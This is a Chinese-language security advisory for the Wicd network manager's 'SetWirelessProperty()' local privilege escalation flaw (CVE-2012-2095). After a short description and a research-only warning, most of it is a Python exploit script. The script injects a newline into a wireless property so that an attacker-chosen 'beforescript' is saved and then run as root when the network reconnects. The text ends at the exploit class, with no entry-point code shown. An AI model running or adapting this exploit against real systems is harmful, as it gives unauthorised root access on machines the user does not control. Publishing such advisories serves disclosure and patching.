Wicd 'SetWirelessProperty()' 本地权限提升漏洞

发布日期：2012-04-11
更新日期：2012-04-25

受影响系统：
Wicd Wicd 1.7.1~b3-4
Wicd Wicd 1.7.1~b3-3
Wicd Wicd 1.5.9
Wicd Wicd 1.5.8
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52987
CVE ID: CVE-2012-2095

Wicd是Linux平台下的开源有线和无线网络管理器。

Wicd在'SetWirelessProperty()'函数的输入验证上存在本地权限提升漏洞，可访问DBUS接口的本地攻击者，可利用超级用户权限利用此漏洞执行任意代码。

<*来源：anonymous
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

anonymous （）提供了如下测试方法：

#!/usr/bin/python
#wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to
import sys
import os
import time
import getopt

try: from wicd import dbusmanager
except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)

class Error(Exception):
    def __init__(self, error):
        self.errorStr=error
   
    def __str__(self):
        return repr(self.errorStr)
   

class Wicd():
    wireless=None
    daemon=None
    versionString=None
    def __init__(self):
        try:
            dbusmanager.connect_to_dbus()
            dbusInterfaces    = dbusmanager.get_dbus_ifaces()
            self.wireless        = dbusInterfaces["wireless"]
            self.daemon        = dbusInterfaces["daemon"]
        except:
            raise Error("Daemon is not running")
        self.versionString = self.daemon.Hello()
   
    def versionLessThan(self, version):
        if int(self.versionString.replace(".",""))<=version:
            return True
        else:
            return False
   

class Exploit():
   
    def __init__(self, wicd, scriptPath):
        self.wicd = wicd
        self.scriptPath = scriptPath
   
    def getNets(self):
        self.wicd.wireless.Scan(True)
        nets = self.wicd.wireless.GetNumberOfNetworks()
        while nets < 1:
            self.wicd.wireless.Scan(True)
            nets = self.wicd.wireless.GetNumberOfNetworks()
        for net in range(nets):
            yield net
   
    def exploit(self):
       
        for net in self.getNets(): pass # Priming scan.
       
        try:
            self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
        except:
            raise Error("Unable to exploit (SetWirelessProperty() failed.)")
       
        try:
            self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
        except:
            raise Error("Unable to exploit (SetWirelessProperty() failed.)")
       
        propertyKey    = 'bssid' # Could be essid, or any other identifiable wireless property
        vulnIdentifier    = self.wicd.wireless.GetWirelessProperty(0, propertyKey)
       
        # TODO: Does this need a try construct?
        self.wicd.wireless.ReloadConfig()
       
        for net in self.getNets(): # Implicit, but required re-scan.
            if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
                self.wicd.wireless.ConnectWireless(net)
                return True
        raise Error("Unable to exploit (Lost the network we were using)")